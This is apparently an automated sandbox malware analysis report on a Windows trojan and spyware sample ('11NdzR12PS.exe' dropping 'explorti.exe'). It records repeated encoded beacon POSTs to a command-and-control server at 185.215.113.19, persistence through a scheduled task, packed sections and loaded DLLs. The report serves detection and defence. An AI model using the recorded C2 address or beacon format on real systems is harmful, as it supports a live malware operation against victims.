Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.19 185.215.113.19

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 5_2_0069BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

5_2_0069BD60

Source: unknown

HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorti.exe, 00000005.00000002.2903017790.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000005.00000002.2903017790.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php4
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php6
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php?
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpC:
Source: explorti.exe, 00000005.00000002.2903017790.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpH
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpWindows
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpeb8a7
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpm32
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpoft
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpon
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phprosoft
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpsM

System Summary

PE file contains section with special chars

Source: 11NdzR12PS.exe	Static PE information: section name:
Source: 11NdzR12PS.exe	Static PE information: section name: .idata
Source: 11NdzR12PS.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:

Creates files inside the system directory

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File created: C:\Windows\Tasks\explorti.job

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D3068	5_2_006D3068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_0069E440	5_2_0069E440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_00694CF0	5_2_00694CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006C7D83	5_2_006C7D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D765B	5_2_006D765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_00694AF0	5_2_00694AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D777B	5_2_006D777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D8720	5_2_006D8720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D6F09	5_2_006D6F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D2BD0	5_2_006D2BD0

Source: 11NdzR12PS.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 11NdzR12PS.exe	Static PE information: Section: ZLIB complexity 0.9997064976092896
Source: 11NdzR12PS.exe	Static PE information: Section: wokugkrf ZLIB complexity 0.9944071718563766
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9997064976092896
Source: explorti.exe.0.dr	Static PE information: Section: wokugkrf ZLIB complexity 0.9944071718563766

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: 11NdzR12PS.exe

Virustotal: Detection: 53%

Source: 11NdzR12PS.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File read: C:\Users\user\Desktop\11NdzR12PS.exe

Source: unknown	Process created: C:\Users\user\Desktop\11NdzR12PS.exe "C:\Users\user\Desktop\11NdzR12PS.exe"
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior

Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: urlmon.dll	Jump to behavior
